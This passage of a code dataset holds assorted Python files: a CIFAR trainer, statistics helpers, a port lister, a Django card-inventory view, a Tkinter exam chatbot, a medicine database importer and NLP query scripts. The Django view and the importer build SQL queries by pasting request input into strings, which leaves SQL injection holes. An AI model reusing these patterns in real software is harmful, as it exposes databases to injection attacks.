print(\"Predict Accuracy:\", accuracy)\n return \"Predict Accuracy:\" + str(accuracy)\n\ndef train(data_files):\n (x_train, y_train), (x_test, y_test),labels = datasets.load_cifar10(data_files)\n x_train = x_train.astype(np.float32).reshape(x_train.shape[0], num_input)\n y_train = y_train.astype(np.float32)\n\n x_test = x_test.astype(np.float32).reshape(x_test.shape[0], num_input)\n y_test = y_test.astype(np.float32)\n\n print('Train mode')\n # tf.logging.set_verbosity(tf.logging.INFO)\n # Build the Estimator\n model = tf.estimator.Estimator(model_fn)\n\n # Define the input function for training\n input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': x_train}, y=y_train,\n batch_size=batch_size, num_epochs=None, shuffle=True)\n\n # Train the Model\n model.train(input_fn, steps=num_steps)\n acc, loss = evaluate(model, x_test, y_test)\n\n feat_spec = {\"images\": tf.placeholder(\"float\", name=\"images\", shape=[None, x_train.shape[1]])}\n # print(feat_spec)\n\n # Export model\n receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feat_spec)\n saved_estimator_path = model.export_savedmodel('saved_model', receiver_fn).decode(\"utf-8\")\n print('model is saved to [%s]' % saved_estimator_path)\n\n model_info = {}\n model_info['acc'] = acc\n model_info['save_path'] = os.path.join(config.project_root, saved_estimator_path)\n model_info['loss'] = loss\n return model_info\n\nif __name__ == \"__main__\":\n train(\"D:/darkd/cifar10_train.csv\")\n if len(sys.argv) <= 1:\n print('lack of arguments!')\n exit(-1)\n\n if sys.argv[1] == 'train':\n train()\n elif sys.argv[1] == 'predict':\n (x_train, y_train), (x_test, y_test) = datasets.load_cifar10()\n predict(sys.argv[2], x_test)\n\n","sub_path":"server/model/cnn_cifar.py","file_name":"cnn_cifar.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"459152061","text":"from scipy.special import erf\nfrom math import sqrt\nfrom math import exp\nfrom math import pi\nfrom random import gauss\n\n\ndef mutual_path(l1, l2):\n '''take two lists of vertices diffusion goes through and return mutual\n path between the two as a set of edges'''\n edges1 = set(tuple(sorted(e)) for e in zip(l1, l1[1:]))\n edges2 = set(tuple(sorted(e)) for e in zip(l2, l2[1:]))\n return edges1 & edges2\n\n\ndef gauss_cdf(x):\n return 0.5 * (1 + erf(x / sqrt(2)))\n\n\ndef standard_normal(x):\n return exp(-0.5 * (x**2)) / sqrt(2 * pi)\n\n\ndef mean_of_min(mu1, mu2, sigma1, sigma2, ro=0):\n th = sqrt(sigma1**2 + sigma2**2 - 2 * ro * sigma1 * sigma2)\n f1 = gauss_cdf((mu2 - mu1) / th)\n f2 = gauss_cdf((mu1 - mu2) / th)\n f3 = standard_normal((mu2 - mu1) / th)\n return mu1 * f1 + mu2 * f2 - th * f3\n\n\ndef var_of_min(mu1, mu2, sigma1, sigma2, ro=0):\n '''ex is mean_of_min(mu1,mu2)'''\n th = sqrt(sigma1**2 + sigma2**2 - 2 * ro * sigma1 * sigma2)\n f1 = gauss_cdf((mu2 - mu1) / th)\n f2 = gauss_cdf((mu1 - mu2) / th)\n f3 = standard_normal((mu2 - mu1) / th)\n ex2 = ((sigma1**2 + mu1**2) * f1 + (sigma2**2 + mu2**2) * f2 -\n (mu1 + mu2) * th * f3)\n return ex2 - (mean_of_min(mu1, mu2, sigma1, sigma2, ro))**2\n\n\ndef mean_of_multiple_shortest(paths, mu, sigma):\n '''assumes the same mean and var on each edge'''\n path_length = len(paths[0]) - 1\n no_paths = len(paths)\n if no_paths > 1:\n outm = mean_of_min(mu * path_length, mu * path_length,\n sigma * sqrt(path_length),\n sigma * sqrt(path_length))\n else:\n outm = path_length * mu\n return outm\n\n\ndef 
var_of_multiple_shortest(paths, mu, sigma):\n '''assumes the same mean and var on each edge'''\n path_length = len(paths[0]) - 1\n no_paths = len(paths)\n if no_paths > 1:\n outv = var_of_min(mu * path_length, mu * path_length,\n sigma * sqrt(path_length),\n sigma * sqrt(path_length))\n else:\n outv = path_length * (sigma**2)\n return outv\n\n\ndef gauss_without_negative(m, s):\n x = gauss(m, s)\n if x < 0:\n x = 0\n return x\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"lsd/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"538453961","text":"#!/usr/bin/env python3\n\n\"\"\"Optional Tasks:\n---------------\n\nSimple:\n\n* Write a python function that lists the services provided by a given range of\n ports.\n\n * accept the lower and upper bounds as arguments\n * provide sensible defaults\n * Ensure that it only accepts valid port numbers (0-65535)\n\n 21: File Transfer Protocol (FTP)\n 22: Secure Shell (SSH)\n 23: Telnet remote login service\n 25: Simple Mail Transfer Protocol (SMTP)\n 53: Domain Name System (DNS) service\n 80: Hypertext Transfer Protocol (HTTP) used in the World Wide Web\n 110: Post Office Protocol (POP3)\n 119: Network News Transfer Protocol (NNTP)\n 123: Network Time Protocol (NTP)\n 143: Internet Message Access Protocol (IMAP)\n 161: Simple Network Management Protocol (SNMP)\n 194: Internet Relay Chat (IRC)\n 443: HTTP Secure (HTTPS)\n\n\"\"\"\n\nimport socket\n\ndef port_report(lower=21, upper=80):\n # include the upper bound in the scan\n for port in range(lower, upper + 1):\n try:\n serv = socket.getservbyport(port)\n except OSError:\n continue\n print(\"Port: {}\\t{}\".format(port, serv))\n\nif __name__ == '__main__':\n port_report()","sub_path":"port_report.py","file_name":"port_report.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348626243","text":"# -*- coding:utf-8 -*-\n__author__ = ''\n__date__ = '2017/3/21 14:57'\n\nimport datetime, json\nfrom django.core.paginator import Paginator # pagination\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom sellcard.common import Method as mth\nfrom sellcard.common.model import MyError\nfrom sellcard.models import CashierList, Shops, CardInventory\n\n\ndef index(request):\n shop = request.session.get('s_shopcode')\n role = request.session.get('s_roleid')\n shops = Shops.objects.values('shop_code','shop_name','city').order_by('shop_code')\n if role in ('1','6','7'):\n shops = shops\n elif role == '8':# Chengde head-office finance\n shops = shops.filter(city='C')\n elif role == '9':# Tangshan head-office finance\n shops = shops.filter(city='T')\n else:\n shops = shops.filter(shop_code=shop)\n shops_len = len(shops)\n if request.method == 'POST':\n shopcode = mth.getReqVal(request, 'shopcode', '')\n keyword = mth.getReqVal(request, 'keyword', '')\n # form pagination parameters: start\n page = mth.getReqVal(request, 'page', 1)\n show_num = mth.getReqVal(request, 'show_num', 8)\n # form pagination parameters: end\n\n conn = mth.getMysqlConn()\n cur = conn.cursor()\n whereStr = \"WHERE t.is_store = 1 \"\n\n if role in ('2', '10'):\n whereStr += \" AND t.shop_code ='\" + shop + \"'\"\n\n\n if shopcode != '':\n whereStr += \" AND t.shop_code ='\" + shopcode + \"'\"\n else:\n shopsCode = ''\n if role == '9':\n shopsCode = mth.getCityShopsCode('T')\n shopsCodeStr = \"'\" + \"','\".join(shopsCode) + \"'\"\n whereStr += \" AND 
t.shop_code IN (\" + shopsCodeStr + \")\"\n if role == '8':\n shopsCode = mth.getCityShopsCode('C')\n shopsCodeStr = \"'\" + \"','\".join(shopsCode) + \"'\"\n whereStr += \" AND t.shop_code IN (\" + shopsCodeStr + \")\"\n\n if keyword != '':\n whereStr += \" AND (c.username like '%\" + keyword + \"%' OR c.`name` like '%\" + keyword + \"%')\"\n\n sql = \"\"\"\nSELECT\n\tt.shop_code,\n\ts.shop_name,\n\tc.username as user_code,\n\tIFNULL(c.`name`, '未分配') AS username,\n\tt.card_value,\n\tcount(t.card_no) AS account,\n\tsum(CASE WHEN t.card_status = 2 THEN 1 ELSE 0 END) AS out_num,\n\tsum(CASE WHEN t.card_status = 1 THEN 1 ELSE 0 END) AS in_num\nFROM\n\tcard_inventory t LEFT JOIN shops s ON t.shop_code = s.shop_code\n\tLEFT JOIN cashier_list c ON t.shop_code = c.shop_code and t.username = c.username\n\"\"\"+ whereStr +\"\"\"\nGROUP BY\n\tt.shop_code,\n\ts.shop_name,\n\tc.username,\n\tc.`name`,\n\tt.card_value\n \"\"\"\n cur.execute(sql)\n List = cur.fetchall()\n\n # form pagination: start\n paginator = Paginator(List, show_num)\n\n try:\n List = paginator.page(page)\n\n if List.number > 1:\n page_up = List.previous_page_number\n else:\n page_up = 1\n\n if List.number < List.paginator.num_pages:\n page_down = List.next_page_number\n else:\n page_down = List.paginator.num_pages\n\n except Exception as e:\n print(e)\n # form pagination: end\n\n return render(request, 'consign/list.html', locals())\n\n\ndef detail(request):\n # add a token to the server-side session so duplicate form submissions can be rejected\n token = 'allow' # a random value could be used instead\n request.session['postToken'] = token\n shop_code = request.session.get('s_shopcode')\n userList= CashierList.objects.values('username', 'name').filter(shop_code=shop_code)\n return render(request, 'consign/detail.html', locals())\n\n\n@transaction.atomic\ndef save(request):\n res = {}\n if request.method == 'POST':\n # check the token in the session to decide whether the submission is legitimate\n Token = request.session.get('postToken', default=None)\n # get the token submitted with the user's form\n userToken = request.POST.get('postToken', '')\n if userToken != Token:\n res[\"msg\"] = 0\n return HttpResponse(json.dumps(res))\n\n shop_code = request.session.get('s_shopcode')\n name = request.POST.get('name')\n start_no = request.POST.get('start_no')\n end_no = request.POST.get('end_no')\n try:\n with transaction.atomic():\n conn = mth.getMysqlConn()\n cur = conn.cursor()\n sql = \" update card_inventory set username='{name}'\" \\\n \" where is_store=1 and shop_code='{shop}' and username=''\" \\\n \" and card_no >= {start} AND card_no <= {end}\"\\\n .format(start=start_no,end=end_no,name=name,shop=shop_code)\n cur.execute(sql)\n res['msg'] = 1\n del request.session['postToken']\n\n except Exception as e:\n print(e)\n res['msg'] = 0\n\n return HttpResponse(json.dumps(res))\n\n","sub_path":"sellcard/fornt/consign/allocate.py","file_name":"allocate.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29800546","text":"from tkinter import *\r\nroot=Tk()\r\n\r\ndef chatbot():\r\n send=e.get(\"1.0\",'end-1c').strip()\r\n e.delete(\"0.0\",END)\r\n\r\n if send != '':\r\n \r\n txt.config(state=NORMAL)\r\n txt.insert(END, \"You: \" + send + '\\n')\r\n txt.config(foreground=\"white\", font=(\"Verdana\", 8 ))\r\n \r\n \r\n j=send.split()\r\n k=len(j)\r\n #print(j)\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"hi\" or j[l]==\"hello\" or j[l]==\"hey\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Hello! I am here to solve your examination queries.\\n\\n\")\r\n \r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\" ):\r\n for 
m in range(0,k):\r\n if(j[m]==\"conducted\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Exams are conducted by the LPU examination department.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"date\" or j[m]==\"dates\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are from 29-04-2020 to 13-05-2020.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exams\"):\r\n for m in range(0,k):\r\n if(j[m]==\"from\" or j[m]==\"starting from\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are from 29-04-2020.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exams\"):\r\n for m in range(0,k):\r\n if(j[m]==\"till\" or j[m]==\"ending\" or j[m]==\"end\" or j[m]==\"ends\"):\r\n txt.insert(END,\"\\n\"+\"BOT:exams are till 13-05-2020.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination\"):\r\n for m in range(0,k):\r\n if(j[m]==\"instructions\"):\r\n txt.insert(END,\"\\n\"+\"BOT:You can find examination instructions in UMS \\n Follow the path UMS navigation -> Examination -> Examination Queries.\\n\\n\")\r\n \r\n\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"examination instructions\" or j[l]==\"instructions\"):\r\n for n in range(0,k):\r\n if(j[n]==\"for\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:You can find examination instructions in UMS \\n Follow the path UMS navigation -> Examination -> Examination Queries.\\n\\n\")\r\n \r\n for l in range(0,k):\r\n if(j[l]==\"seating\"):\r\n for m in range(0,k):\r\n if(j[m]==\"plan\" or j[m]==\"arrangement\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It will be available in your allotted examination class.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"examination\" or j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"timings\" or j[m]==\"classroom\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It will be uploaded on UMS -> seating arrangements, or it will be available on LPU Touch under exams.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"exam\"):\r\n for m in range(0,k):\r\n if(j[m]==\"pattern\"):\r\n txt.insert(END,\"\\n\"+\"BOT:It is based on the course. You can find it in the UMS.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"grades\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Grades are given subject wise. Grades O to D are a pass, grade E is a reappear and F is a fail. You have 5 chances to clear your reappears.\\n\\n\")\r\n\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"doubts\" or j[l]==\"discrepancy\"):\r\n for n in range(0,k):\r\n if(j[n]==\"in\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:There is a discrepancy form with the invigilator where you need to fill in your doubts about the question paper.\\n\\n\")\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"eligible\"):\r\n for n in range(0,k):\r\n if(j[n]==\"for\"):\r\n for m in range(0,k):\r\n if(j[m]==\"exams\" or j[m]==\"examination\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Students whose attendance is above 75% are eligible for examination.\\n\\n\")\r\n\r\n\r\n\r\n for l in range(0,k):\r\n if(j[l]==\"contact\"):\r\n for m in range(0,k):\r\n if(j[m]==\"details\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Here are our contact numbers:\\n9986523741\\n7894561235.\\n\\n\")\r\n \r\n\r\n for l in range(0,k):\r\n if(j[l]==\"bye\"):\r\n txt.insert(END,\"\\n\"+\"BOT:Hope your queries are cleared and if you have any further doubts you can visit block no:30 \\n All 
the best for your exams from LPU chatbot.\\n\\n\")\r\n\r\n\r\n \r\n \r\n\r\n\r\ntxt=Text(root)\r\ntxt.grid(row=0,column=0,columnspan=2)\r\nroot.geometry(\"400x500\")\r\nroot.resizable(width=FALSE, height=FALSE)\r\n\r\ne=Text(root, bd=0, bg=\"white\",width=\"29\", height=\"5\", font=\"Arial\")\r\nSendButton = Button(root, font=(\"Verdana\",12,'bold'), text=\"Send\", width=\"12\", height=5,\r\n bd=0, bg=\"#32de97\", activebackground=\"#3c9d9b\",fg='#ffffff',\r\n command=chatbot)\r\n\r\nroot.title(\"LPU EXAMINATION QUERIES\")\r\n\r\n\r\ntxt = Text(root, bd=0, bg=\"black\", height=\"8\", width=\"50\", font=\"Arial\",)\r\ntxt.config(state=DISABLED)\r\n\r\nscrollbar = Scrollbar(root, command=txt.yview, cursor=\"heart\")\r\ntxt['yscrollcommand'] = scrollbar.set\r\n\r\nscrollbar.place(x=376,y=6, height=386)\r\ntxt.place(x=6,y=6, height=386, width=370)\r\ne.place(x=144, y=401, height=90, width=265)\r\nSendButton.place(x=6, y=401, height=90)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409496498","text":" # MATCHING 0 OR MORE WITH STARS\nimport re\n\ni = re.compile(r'bat(wo)*man')\nI = i.search('i saw batman')\nIi = i.search('i saw batwoman')\nII = i.search('i saw batwowowowowowowowoman')\n\nprint(I.group(),Ii.group(),II.group())\n\n''' \nthe star means the group may repeat zero or more times: if the pattern matches it is printed, and when the word in the parentheses is repeated multiple times it matches that as well \n\n'''\n\n\n","sub_path":"pattern matching and with regular expression/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282478123","text":"import json\n\nfrom databasehelper import DatabaseConnection\nfrom settings import SETTINGS\n\n\nclass Medicine():\n def __init__(self, json_data):\n self.json_data = json_data\n\n self.__name = ''\n self.__concentrate = ''\n self.__package = ''\n self.__form = ''\n self.__producer = ''\n self.__producer_country = ''\n self.__price = 0.0\n\n @property\n def name(self):\n self.__name = self.json_data['den_produs']\n return self.__name\n\n @property\n def concentrate(self):\n self.__concentrate = self.json_data['concentr']\n return self.__concentrate\n\n @property\n def package(self):\n self.__package = self.json_data['ambalaj']\n return self.__package\n\n @property\n def form(self):\n self.__form = self.json_data['forma']\n return self.__form\n\n @property\n def producer(self):\n prod = self.json_data['firma'].split(' - ')\n if len(prod) == 2:\n self.__producer = prod[0]\n else:\n self.__producer = prod[0] + ' - ' + prod[1]\n return self.__producer\n\n @property\n def producer_country(self):\n prod = self.json_data['firma'].split(' - ')\n self.__producer_country = prod[len(prod)-1]\n return self.__producer_country\n\n @property\n def price(self):\n self.__price = self.json_data['pret_prod']\n return self.__price\n\n\nclass MedicineComposition():\n def __init__(self):\n pass\n\n def add_new(self, db, con, d, medicine_id):\n comp_id_if_exists = db.select_id(con, \"SELECT id FROM composition WHERE name='%s';\" % d)\n print('COMP_IF_EXISTS', comp_id_if_exists)\n if comp_id_if_exists == 0:\n query_one = \"INSERT INTO composition (name) VALUES ('%s');\" % d\n print(\"INSERT IN COMPOSITION:\", query_one)\n db.execute_query(con, query_one)\n composition_id = db.count_all(con, \"SELECT * FROM 
composition;\")\n print(composition_id, medicine_id)\n query_two = \"INSERT INTO medicine_composition (medicine_id, composition_id) VALUES (%d, %d)\" % (\n medicine_id, composition_id)\n print(\"INSERT IN MED_COMP:\", query_two)\n db.execute_query(con, query_two)\n else:\n query_two = \"INSERT INTO medicine_composition (medicine_id, composition_id) VALUES (%d, %d)\" % (\n medicine_id, comp_id_if_exists)\n print(\"INSERT IN MED_COMP: \", query_two)\n db.execute_query(con, query_two)\n\n\nif __name__ == \"__main__\":\n db = DatabaseConnection(SETTINGS.DATABASE_NAME, SETTINGS.DATABASE_USERNAME, SETTINGS.DATABASE_PASSWORD)\n con = db.connection\n\n db.reset_tables(con, \"faw_create_medicine_composition.sql\")\n\n json_file = open(SETTINGS.JSON_PATH + '_medicine_list.json', 'r')\n json_data = json.load(json_file)\n\n for i in range(0, len(json_data)):\n data = json_data[i]\n\n # medicine\n medicine = Medicine(data)\n query = \"INSERT INTO medicine (name, concentrate, package, form, producer, producer_country, price) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', %.2f);\" %(\n medicine.name, medicine.concentrate, medicine.package, medicine.form,\n medicine.producer, medicine.producer_country, medicine.price)\n print(\"INSERT IN MEDICINE:\", query)\n db.execute_query(con, query)\n\n # composition\n dci = data['dci']\n mc = MedicineComposition()\n\n medicine_id = db.count_all(con, \"SELECT * FROM medicine;\")\n if dci.find(' + ') != -1:\n dci_list = dci.split(' + ')\n for d in dci_list:\n mc.add_new(db, con, d, medicine_id)\n else:\n mc.add_new(db, con, dci, medicine_id)\n","sub_path":"database/py_scripts/medicine.py","file_name":"medicine.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386530821","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ManagementLockObject(Model):\n \"\"\"The lock information.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :param level: The level of the lock. Possible values are: NotSpecified,\n CanNotDelete, ReadOnly. CanNotDelete means authorized users are able to\n read and modify the resources, but not delete. ReadOnly means authorized\n users can only read from a resource, but they can't modify or delete it.\n Possible values include: 'NotSpecified', 'CanNotDelete', 'ReadOnly'\n :type level: str or\n ~azure.mgmt.resource.locks.v2016_09_01.models.LockLevel\n :param notes: Notes about the lock. 
Maximum of 512 characters.\n :type notes: str\n :param owners: The owners of the lock.\n :type owners:\n list[~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockOwner]\n :ivar id: The resource ID of the lock.\n :vartype id: str\n :ivar type: The resource type of the lock - Microsoft.Authorization/locks.\n :vartype type: str\n :param name: The name of the lock.\n :type name: str\n \"\"\"\n\n _validation = {\n 'level': {'required': True},\n 'id': {'readonly': True},\n 'type': {'readonly': True},\n }\n\n _attribute_map = {\n 'level': {'key': 'properties.level', 'type': 'str'},\n 'notes': {'key': 'properties.notes', 'type': 'str'},\n 'owners': {'key': 'properties.owners', 'type': '[ManagementLockOwner]'},\n 'id': {'key': 'id', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n }\n\n def __init__(self, level, notes=None, owners=None, name=None):\n super(ManagementLockObject, self).__init__()\n self.level = level\n self.notes = notes\n self.owners = owners\n self.id = None\n self.type = None\n self.name = name\n","sub_path":"azure-mgmt-resource/azure/mgmt/resource/locks/v2016_09_01/models/management_lock_object.py","file_name":"management_lock_object.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359710667","text":"import sjuman2_spate505 as part1\nimport os,sys\nfrom nltk.parse import CoreNLPParser,CoreNLPDependencyParser\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom sqlite3 import Error\nimport query_movies\nimport music_geog\n\ndef return_deptree(qstn,parser):\n\tparse = next(parser.raw_parse(qstn))\n\treturn parse\n\n\nif __name__=='__main__':\n\tfilename=\"\"\n\twhile True:\n\t\tpathname = os.path.dirname(sys.argv[0])\n\t\tif len(sys.argv)==2:\n\t\t\tfilename=sys.argv[1]\n\t\t\tif os.path.isfile(os.path.join(pathname,filename)):\n\t\t\t\tfilename=os.path.join(pathname,filename)\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"File name not provided or file does not exist, please enter the filename:\")\n\t\t\tfilename=input().strip()\n\t\t\tif os.path.isfile(os.path.join(pathname,filename)):\n\t\t\t\tfilename=os.path.join(pathname,filename)\n\t\t\t\tbreak\n\tgeog=['place','continent','region','mountain','ocean','river','country','capital','forest','desert','locate','border','city','state','valley','sea','hill','geography','waterfall','volcano']\n\tmovies_list =['actor','actress','movie','direct','film','oscar','star','theatre','play','plot','drama','shoot','cinema','act']\n\tmusic_list = ['sing','record','album','song','artist','rap','track','record','music','compose','rock','pop','dance','singer','blues','indie']\n \n\t#Setting up music category\n\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\tif conn is not None:\n\t\tmus_name,songs=part1.music(conn)\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"SELECT name FROM album\")\n\t\trows = cur.fetchall()\n\t\talbums=set()\n\t\tfor row in rows:\n\t\t\tr=str(row).lower().split(\" \")\n\t\t\talbums.add(r[0])\n\t\t\talbums.add(r[1])\n\t\tcur.execute(\"SELECT name FROM track\")\n\t\trows = cur.fetchall()\n\t\ttracks=set()\n\t\tfor row in rows:\n\t\t\tr=str(row).lower().split(\" \")\n\t\t\ttracks.add(r[0])\n\t\t\ttracks.add(r[1])\n\t\t\ttracks.add(r[2])\n\n\t#Setting up geography category\n\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\tif conn is not None:\n\t\tgeog_db=part1.geography_db(conn)\n\n\n\t\t#Getting 
the set of similar words from wordnet\n\t\tgeog_set=part1.create_lists(geog)\t \n\t\tmov_set=part1.create_lists(movies_list)\n\t\tmusic_set=part1.create_lists(music_list)\n\t\tmov_set.add('schindler')\n#Getting the tags\n\tqstn,ner,pos=part1.tagging(filename)\n\tparser = CoreNLPParser(url='http://localhost:9000')\n\tdep_parser = CoreNLPDependencyParser(url='http://localhost:9000')\n\t# Printing parse tree and output\n\tfor i in range(0,len(qstn)):\n\t\tqtype=\"YesNo\"\n\t\tprint(\"Question: \", qstn[i].strip())\n\t\tparsed=part1.parse_tree(qstn[i],parser)\n\t\tdep_parsed=return_deptree(qstn[i],dep_parser)\n\t\n\t\tif 'SBAR' in parsed[0:15]:\n\t\t\tqtype=\"WH\"\n\t\tcategory=part1.categorize(qstn[i],ner[i],pos[i],geog_set,mov_set,music_set, mus_name,songs,geog_db)\n\t\n\t\tif category==\"Music\":\n\t \n\t\t\tif qtype==\"WH\":\n\t\t\n\t\t\t\tsql_query=music_geog.ans_music_wh(dep_parsed,parsed,ner[i],qstn[i],albums,tracks)\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t \n\t\t\telse:\n\t\t\t\tsql_query=music_geog.ans_music_yesno(dep_parsed,parsed,ner[i],qstn[i],albums,tracks)\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"music.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t \n\n\t\telif category==\"Movies\":\n\t\t\tquery=query_movies.generate_query(dep_parsed,ner[i],parsed,mov_set)\n\t\t\tquery_movies.run_query_m(query)\n\t\t\tprint(\"----------------------------------------\")\n\n\t\telse:\n\t\t\tif qtype==\"WH\":\n\t\t\t\tsql_query=music_geog.ans_geog_wh(dep_parsed,parsed,ner[i])\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\n\t\t\telse:\n\t\t\t\tsql_query =music_geog.ans_geog_yesno(qstn[i],dep_parsed,parsed,ner[i])\n\t\t\t\ttry:\n\t\t\t\t\tconn=part1.create_connection(os.path.join(\"Database\",\"WorldGeography.sqlite\"))\n\t\t\t\t\tcur = conn.cursor()\n\t\t\t\t\tcur.execute(sql_query)\n\t\t\t\t\trows = cur.fetchall()\n\t\t\t\t\tif not rows:\n\t\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Answer: \" + 
str(rows[0][0]))\n\t\t\t\t\t\tprint(\"----------------------------------------\")\n\t\t\t\texcept Error:\n\t\t\t\t\tprint(\"Answer: I don't know!\")\n\t\t\t\t\tprint(\"----------------------------------------\")\n\n\t\t\n\n","sub_path":"sjuman2_spate505/part2_new.py","file_name":"part2_new.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"379933395","text":"from sqlalchemy.exc import SQLAlchemyError\nfrom app.index import db\n\n\ndef create(*args, **kwargs):\n \"\"\"\n Return model instance that had been created\n @param args[0] Model class\n @param kwargs Named arguments i.e. something=value\n \"\"\"\n try:\n\n # Checks model class arguments\n if not kwargs:\n new_obj = args[0]()\n else:\n new_obj = args[0](**kwargs)\n \n\n if type(new_obj) is not args[0]:\n raise TypeError(\"new_obj is not of type {}\".format(args[0]))\n db.session.add(new_obj)\n db.session.flush()\n return new_obj\n except (SQLAlchemyError, TypeError):\n db.session.rollback()\n return False","sub_path":"app/utils/model_utils/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"200728034","text":"import pygame\nfrom network 